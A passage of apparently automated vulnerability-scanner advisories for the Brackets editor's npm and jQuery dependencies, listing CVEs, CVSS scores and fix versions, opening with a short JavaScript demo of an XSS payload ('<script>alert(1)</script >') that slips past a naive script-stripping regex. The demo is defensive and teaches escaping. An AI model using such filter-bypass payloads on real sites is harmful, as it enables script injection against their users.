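const TOLERANT_SCRIPT_RE = /<script\b[\s\S]*?<\/script\s*>/gi;

function stripScriptsNaive(html) {
  return html.replace(NAIVE_SCRIPT_RE, '');
}

function stripScriptsTolerant(html) {
  return html.replace(TOLERANT_SCRIPT_RE, '');
}

// Did anything script-shaped survive the cleaning step?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// The robust choice for untrusted responses: do not try to sanitise
// markup by subtraction; treat the response as text and escape it, so it
// can only ever be rendered, never parsed as HTML.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed payload: the closing tag carries a space before ">".
const PAYLOAD = '<div>hi</div><script>alert(1)</script ><p>bye</p>';

console.log('naive    :', stripScriptsNaive(PAYLOAD));
console.log('tolerant :', stripScriptsTolerant(PAYLOAD));
console.log('escaped  :', escapeHtml(PAYLOAD));
```

Even the tolerant pattern is a deny-list and will be beaten by the next encoding trick; the durable fix the later jQuery advisories on this page point to is the same: never hand untrusted HTML to `.load()`, `.html()` or `.append()`.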

Publish Date: 2020-05-19

URL: CVE-2020-7656

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: GHSA-q4m3-2j7h-f7xw

Release Date: 2020-05-28

Fix Resolution: jquery - 1.9.0



CVE-2015-9251 (Medium) detected in multiple libraries - autoclosed

CVE-2015-9251 - Medium Severity Vulnerability

Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js, jquery-1.3.2.min.js

jquery-2.1.3.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js

Path to dependency file: brackets/src/index.html

Path to vulnerable library: /src/thirdparty/jquery-2.1.3.min.js,/test/../src/thirdparty/jquery-2.1.3.min.js

Dependency Hierarchy:

  • jquery-2.1.3.min.js (Vulnerable Library)

jquery-1.7.1.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js

Path to dependency file: brackets/src/LiveDevelopment/Inspector/inspector.html

Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html

Dependency Hierarchy:

  • jquery-1.7.1.min.js (Vulnerable Library)

jquery-1.3.2.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.3.2/jquery.min.js

Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/underscore.string/test/test_underscore/temp_tests.html

Path to vulnerable library: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/underscore.string/test/test_underscore/vendor/jquery.js

Dependency Hierarchy:

  • jquery-1.3.2.min.js (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.

Publish Date: 2018-01-18

URL: CVE-2015-9251

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2015-9251

Release Date: 2018-01-18

Fix Resolution: jQuery - v3.0.0



CVE-2020-8116 (High) detected in dot-prop-4.2.0.tgz

CVE-2020-8116 - High Severity Vulnerability

Vulnerable Library - dot-prop-4.2.0.tgz

Get, set, or delete a property from a nested object using a dot path

Library home page: https://registry.npmjs.org/dot-prop/-/dot-prop-4.2.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/npm/node_modules/dot-prop/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • update-notifier-2.5.0.tgz
      • configstore-3.1.2.tgz
        • dot-prop-4.2.0.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.

Publish Date: 2020-02-04

URL: CVE-2020-8116

CVSS 3 Score Details (7.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: Low


Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8116

Release Date: 2020-02-04

Fix Resolution (dot-prop): 4.2.1

Direct dependency fix Resolution (npm): 6.14.7



WS-2013-0004 (Medium) detected in connect-1.8.7.tgz

WS-2013-0004 - Medium Severity Vulnerability

Vulnerable Library - connect-1.8.7.tgz

High performance middleware framework

Library home page: https://registry.npmjs.org/connect/-/connect-1.8.7.tgz

Path to dependency file: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json

Path to vulnerable library: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/connect/package.json

Dependency Hierarchy:

  • grunt-0.3.9.tgz (Root Library)
    • connect-1.8.7.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

The "methodOverride" middleware lets an HTTP POST override the request method with the value of a POST key or of a header, which allows an XSS attack.

Publish Date: 2013-06-27

URL: WS-2013-0004

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Release Date: 2013-06-27

Fix Resolution (connect): 2.8.1

Direct dependency fix Resolution (grunt): 0.4.0



CVE-2020-7788 (Critical) detected in ini-1.3.5.tgz

CVE-2020-7788 - Critical Severity Vulnerability

Vulnerable Library - ini-1.3.5.tgz

An ini encoder/decoder for node

Library home page: https://registry.npmjs.org/ini/-/ini-1.3.5.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/npm/node_modules/ini/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • ini-1.3.5.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

This affects the package ini before 1.3.6. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Publish Date: 2020-12-11

URL: CVE-2020-7788

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788

Release Date: 2020-12-11

Fix Resolution (ini): 1.3.6

Direct dependency fix Resolution (npm): 6.14.7



CVE-2017-16042 (Critical) detected in growl-1.7.0.tgz

CVE-2017-16042 - Critical Severity Vulnerability

Vulnerable Library - growl-1.7.0.tgz

Growl unobtrusive notifications

Library home page: https://registry.npmjs.org/growl/-/growl-1.7.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/growl/package.json

Dependency Hierarchy:

  • jasmine-node-1.11.0.tgz (Root Library)
    • jasmine-growl-reporter-0.0.3.tgz
      • growl-1.7.0.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: gh-pages

Vulnerability Details

Growl adds growl notification support to nodejs. Growl before 1.10.2 does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.

Publish Date: 2018-04-26

URL: CVE-2017-16042

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2017-16042

Release Date: 2018-04-26

Fix Resolution (growl): 1.10.2

Direct dependency fix Resolution (jasmine-node): 3.0.0



CVE-2017-16042 (High) detected in growl-1.10.0.tgz - autoclosed

CVE-2017-16042 - High Severity Vulnerability

Vulnerable Library - growl-1.10.0.tgz

Growl unobtrusive notifications

Library home page: https://registry.npmjs.org/growl/-/growl-1.10.0.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/growl/package.json

Dependency Hierarchy:

  • jasmine-node-1.14.6.tgz (Root Library)
    • jasmine-growl-reporter-1.0.3.tgz
      • growl-1.10.0.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: master

Vulnerability Details

Growl adds growl notification support to nodejs. Growl before 1.10.2 does not properly sanitize input before passing it to exec, allowing for arbitrary command execution.

Publish Date: 2018-06-04

URL: CVE-2017-16042

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2017-16042

Release Date: 2018-06-04

Fix Resolution: 1.10.2


Step up your Open Source Security Game with WhiteSource here

CVE-2016-1000232 (Medium) detected in tough-cookie-2.2.2.tgz - autoclosed

CVE-2016-1000232 - Medium Severity Vulnerability

Vulnerable Library - tough-cookie-2.2.2.tgz

RFC6265 Cookies and Cookie Jar for node.js

Library home page: https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.2.2.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/phantomjs/node_modules/tough-cookie/package.json

Dependency Hierarchy:

  • phantomjs-2.1.1.tgz (Root Library)
    • request-2.67.0.tgz
      • tough-cookie-2.2.2.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

NodeJS Tough-Cookie version 2.2.2 contains a Regular Expression Parsing vulnerability in HTTP request Cookie Header parsing that can result in Denial of Service. This attack appears to be exploitable via a custom HTTP header passed by the client. This vulnerability appears to have been fixed in 2.3.0.

Publish Date: 2018-09-05

URL: CVE-2016-1000232

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low


Suggested Fix

Type: Upgrade version

Origin: https://www.npmjs.com/advisories/130

Release Date: 2018-09-05

Fix Resolution: 2.3.0



CVE-2017-1000048 (High) detected in multiple libraries

CVE-2017-1000048 - High Severity Vulnerability

Vulnerable Libraries - qs-1.2.2.tgz, qs-5.2.0.tgz, qs-5.1.0.tgz

qs-1.2.2.tgz

A querystring parser that supports nesting and arrays, with a depth limit

Library home page: https://registry.npmjs.org/qs/-/qs-1.2.2.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/phantomjs/node_modules/qs/package.json

Dependency Hierarchy:

  • phantomjs-1.9.18.tgz (Root Library)
    • request-2.42.0.tgz
      • qs-1.2.2.tgz (Vulnerable Library)

qs-5.2.0.tgz

A querystring parser that supports nesting and arrays, with a depth limit

Library home page: https://registry.npmjs.org/qs/-/qs-5.2.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/body-parser/node_modules/qs/package.json

Dependency Hierarchy:

  • grunt-contrib-watch-1.0.0.tgz (Root Library)
    • tiny-lr-0.2.1.tgz
      • body-parser-1.14.2.tgz
        • qs-5.2.0.tgz (Vulnerable Library)

qs-5.1.0.tgz

A querystring parser that supports nesting and arrays, with a depth limit

Library home page: https://registry.npmjs.org/qs/-/qs-5.1.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/tiny-lr/node_modules/qs/package.json

Dependency Hierarchy:

  • grunt-contrib-watch-1.0.0.tgz (Root Library)
    • tiny-lr-0.2.1.tgz
      • qs-5.1.0.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

A web framework using ljharb's qs module older than v6.3.2, v6.2.3, v6.1.2, or v6.0.4 is vulnerable to a DoS. A malicious user can send an evil request to crash the web framework.

Publish Date: 2017-07-17

URL: CVE-2017-1000048

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000048

Release Date: 2017-07-13

Fix Resolution (qs): 6.0.4

Direct dependency fix Resolution (grunt-contrib-watch): 1.1.0



CVE-2020-7660 (High) detected in serialize-javascript-1.9.1.tgz - autoclosed

CVE-2020-7660 - High Severity Vulnerability

Vulnerable Library - serialize-javascript-1.9.1.tgz

Serialize JavaScript to a superset of JSON that includes regular expressions and functions.

Library home page: https://registry.npmjs.org/serialize-javascript/-/serialize-javascript-1.9.1.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/serialize-javascript/package.json

Dependency Hierarchy:

  • webpack-4.0.0.tgz (Root Library)
    • uglifyjs-webpack-plugin-1.3.0.tgz
      • serialize-javascript-1.9.1.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

serialize-javascript prior to 3.1.0 allows remote attackers to inject arbitrary code via the function "deleteFunctions" within "index.js".

Publish Date: 2020-06-01

URL: CVE-2020-7660

CVSS 3 Score Details (8.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7660

Release Date: 2020-06-01

Fix Resolution: serialize-javascript - 3.1.0



CVE-2018-16492 (Critical) detected in extend-3.0.1.tgz

CVE-2018-16492 - Critical Severity Vulnerability

Vulnerable Library - extend-3.0.1.tgz

Port of jQuery.extend for node.js and the browser

Library home page: https://registry.npmjs.org/extend/-/extend-3.0.1.tgz

Path to dependency file: /src/package.json

Path to vulnerable library: /src/node_modules/extend/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • request-2.81.0.tgz
      • extend-3.0.1.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: gh-pages

Vulnerability Details

A prototype pollution vulnerability was found in module extend <2.0.2, ~<3.0.2 that allows an attacker to inject arbitrary properties onto Object.prototype.

Publish Date: 2019-02-01

URL: CVE-2018-16492

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://hackerone.com/reports/381185

Release Date: 2019-02-01

Fix Resolution (extend): 3.0.2

Direct dependency fix Resolution (less): 2.7.3



WS-2018-0084 (High) detected in sshpk-1.13.1.tgz - autoclosed

WS-2018-0084 - High Severity Vulnerability

Vulnerable Library - sshpk-1.13.1.tgz

A library for finding and using SSH public keys

Library home page: https://registry.npmjs.org/sshpk/-/sshpk-1.13.1.tgz

Path to dependency file: brackets/src/package.json

Path to vulnerable library: brackets/src/node_modules/sshpk/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • request-2.81.0.tgz
      • http-signature-1.1.1.tgz
        • sshpk-1.13.1.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: checkTravis

Vulnerability Details

Versions of sshpk before 1.14.1 are vulnerable to regular expression denial of service when parsing crafted invalid public keys.

Publish Date: 2018-04-25

URL: WS-2018-0084

CVSS 2 Score Details (8.0)

Base Score Metrics not available

Suggested Fix

Type: Upgrade version

Origin: https://nodesecurity.io/advisories/606

Release Date: 2018-01-27

Fix Resolution: 1.14.1



CVE-2020-8116 (High) detected in dot-prop-4.2.0.tgz - autoclosed

CVE-2020-8116 - High Severity Vulnerability

Vulnerable Library - dot-prop-4.2.0.tgz

Get, set, or delete a property from a nested object using a dot path

Library home page: https://registry.npmjs.org/dot-prop/-/dot-prop-4.2.0.tgz

Path to dependency file: brackets/package.json

Path to vulnerable library: brackets/node_modules/npm/node_modules/dot-prop/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • update-notifier-2.5.0.tgz
      • configstore-3.1.2.tgz
        • dot-prop-4.2.0.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

Prototype pollution vulnerability in dot-prop npm package versions before 4.2.1 and versions 5.x before 5.1.1 allows an attacker to add arbitrary properties to JavaScript language constructs such as objects.

Publish Date: 2020-02-04

URL: CVE-2020-8116

CVSS 3 Score Details (7.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: Low


Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8116

Release Date: 2020-02-04

Fix Resolution: dot-prop - 5.1.1



CVE-2020-7774 (Critical) detected in y18n-4.0.0.tgz, y18n-3.2.1.tgz

CVE-2020-7774 - Critical Severity Vulnerability

Vulnerable Libraries - y18n-4.0.0.tgz, y18n-3.2.1.tgz

y18n-4.0.0.tgz

the bare-bones internationalization library used by yargs

Library home page: https://registry.npmjs.org/y18n/-/y18n-4.0.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/npm/node_modules/y18n/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • cacache-12.0.3.tgz
      • y18n-4.0.0.tgz (Vulnerable Library)

y18n-3.2.1.tgz

the bare-bones internationalization library used by yargs

Library home page: https://registry.npmjs.org/y18n/-/y18n-3.2.1.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/npm/node_modules/yargs/node_modules/y18n/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • libnpx-10.2.2.tgz
      • yargs-11.1.1.tgz
        • y18n-3.2.1.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

The package y18n before 3.2.2, 4.0.1 and 5.0.5, is vulnerable to Prototype Pollution.

Publish Date: 2020-11-17

URL: CVE-2020-7774

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://www.npmjs.com/advisories/1654

Release Date: 2020-11-17

Fix Resolution (y18n): 4.0.1

Direct dependency fix Resolution (npm): 6.14.7



WS-2013-0003 (Medium) detected in connect-1.8.7.tgz

WS-2013-0003 - Medium Severity Vulnerability

Vulnerable Library - connect-1.8.7.tgz

High performance middleware framework

Library home page: https://registry.npmjs.org/connect/-/connect-1.8.7.tgz

Path to dependency file: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json

Path to vulnerable library: /src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/connect/package.json

Dependency Hierarchy:

  • grunt-0.3.9.tgz (Root Library)
    • connect-1.8.7.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

senchalabs/connect prior to 2.8.1 is vulnerable to an XSS attack.

Publish Date: 2013-06-27

URL: WS-2013-0003

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: None
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/WS-2013-0003

Release Date: 2013-06-27

Fix Resolution (connect): 2.8.1

Direct dependency fix Resolution (grunt): 0.4.0



WS-2013-0003 (Medium) detected in connect-1.8.7.tgz - autoclosed

WS-2013-0003 - Medium Severity Vulnerability

Vulnerable Library - connect-1.8.7.tgz

High performance middleware framework

Library home page: https://registry.npmjs.org/connect/-/connect-1.8.7.tgz

Path to dependency file: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/package.json

Path to vulnerable library: brackets/src/extensions/default/JavaScriptQuickEdit/unittest-files/jquery-ui/node_modules/connect/package.json

Dependency Hierarchy:

  • grunt-0.3.9.tgz (Root Library)
    • connect-1.8.7.tgz (Vulnerable Library)

Found in HEAD commit: 38b389e26019954346ecebf98a10c2f5fa9a0488

Found in base branch: master

Vulnerability Details

senchalabs/connect prior to 2.8.1 is vulnerable to an XSS attack.

Publish Date: 2013-06-27

URL: WS-2013-0003

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: None
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://nodesecurity.io/advisories/methodOverride_Middleware_Reflected_Cross-Site_Scripting

Release Date: 2013-07-01

Fix Resolution: Update to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware in the top of your stack.



WS-2018-0076 (Medium) detected in tunnel-agent-0.4.3.tgz

WS-2018-0076 - Medium Severity Vulnerability

Vulnerable Library - tunnel-agent-0.4.3.tgz

HTTP proxy tunneling agent. Formerly part of mikeal/request, now a standalone module.

Library home page: https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.4.3.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/tunnel-agent/package.json

Dependency Hierarchy:

  • request-2.79.0.tgz (Root Library)
    • tunnel-agent-0.4.3.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

Versions of tunnel-agent before 0.6.0 are vulnerable to memory exposure. This is exploitable if user supplied input is provided to the auth value and is a number.

Publish Date: 2017-03-05

URL: WS-2018-0076

CVSS 3 Score Details (5.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: None
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://nodesecurity.io/advisories/598

Release Date: 2017-03-05

Fix Resolution (tunnel-agent): 0.6.0

Direct dependency fix Resolution (request): 2.81.0



CVE-2015-9251 (Medium) detected in jquery-2.1.3.min.js, jquery-1.7.1.min.js

CVE-2015-9251 - Medium Severity Vulnerability

Vulnerable Libraries - jquery-2.1.3.min.js, jquery-1.7.1.min.js

jquery-2.1.3.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js

Path to dependency file: /test/SpecRunner.html

Path to vulnerable library: /test/../src/thirdparty/jquery-2.1.3.min.js,/src/thirdparty/jquery-2.1.3.min.js

Dependency Hierarchy:

  • jquery-2.1.3.min.js (Vulnerable Library)

jquery-1.7.1.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/1.7.1/jquery.min.js

Path to dependency file: /src/LiveDevelopment/Inspector/inspector.html

Path to vulnerable library: /src/LiveDevelopment/Inspector/inspector.html

Dependency Hierarchy:

  • jquery-1.7.1.min.js (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed.

Publish Date: 2018-01-18

URL: CVE-2015-9251

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://nvd.nist.gov/vuln/detail/CVE-2015-9251

Release Date: 2018-01-18

Fix Resolution: jQuery - 3.0.0



CVE-2018-3737 (High) detected in sshpk-1.13.1.tgz

CVE-2018-3737 - High Severity Vulnerability

Vulnerable Library - sshpk-1.13.1.tgz

A library for finding and using SSH public keys

Library home page: https://registry.npmjs.org/sshpk/-/sshpk-1.13.1.tgz

Path to dependency file: /src/package.json

Path to vulnerable library: /src/node_modules/sshpk/package.json

Dependency Hierarchy:

  • less-2.7.2.tgz (Root Library)
    • request-2.81.0.tgz
      • http-signature-1.1.1.tgz
        • sshpk-1.13.1.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

sshpk is vulnerable to ReDoS when parsing crafted invalid public keys.

Publish Date: 2018-06-07

URL: CVE-2018-3737

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High


Suggested Fix

Type: Upgrade version

Origin: https://hackerone.com/reports/319593

Release Date: 2018-04-26

Fix Resolution (sshpk): 1.13.2

Direct dependency fix Resolution (less): 2.7.3



CVE-2019-11358 (Medium) detected in jquery-2.1.3.min.js

CVE-2019-11358 - Medium Severity Vulnerability

Vulnerable Library - jquery-2.1.3.min.js

JavaScript library for DOM operations

Library home page: https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js

Path to dependency file: /test/SpecRunner.html

Path to vulnerable library: /test/../src/thirdparty/jquery-2.1.3.min.js,/src/thirdparty/jquery-2.1.3.min.js

Dependency Hierarchy:

  • jquery-2.1.3.min.js (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable `__proto__` property, it could extend the native Object.prototype.

Publish Date: 2019-04-20

URL: CVE-2019-11358

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None


Suggested Fix

Type: Upgrade version

Origin: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11358

Release Date: 2019-04-20

Fix Resolution: jquery - 3.4.0



CVE-2021-27290 (High) detected in ssri-6.0.1.tgz

CVE-2021-27290 - High Severity Vulnerability

Vulnerable Library - ssri-6.0.1.tgz

Standard Subresource Integrity library -- parses, serializes, generates, and verifies integrity metadata according to the SRI spec.

Library home page: https://registry.npmjs.org/ssri/-/ssri-6.0.1.tgz

Path to dependency file: /package.json

Path to vulnerable library: /node_modules/npm/node_modules/ssri/package.json

Dependency Hierarchy:

  • npm-6.14.6.tgz (Root Library)
    • ssri-6.0.1.tgz (Vulnerable Library)

Found in HEAD commit: 3fa45ae9a1a5190c6d0729a3d4b58907c1ad749e

Found in base branch: gh-pages

Vulnerability Details

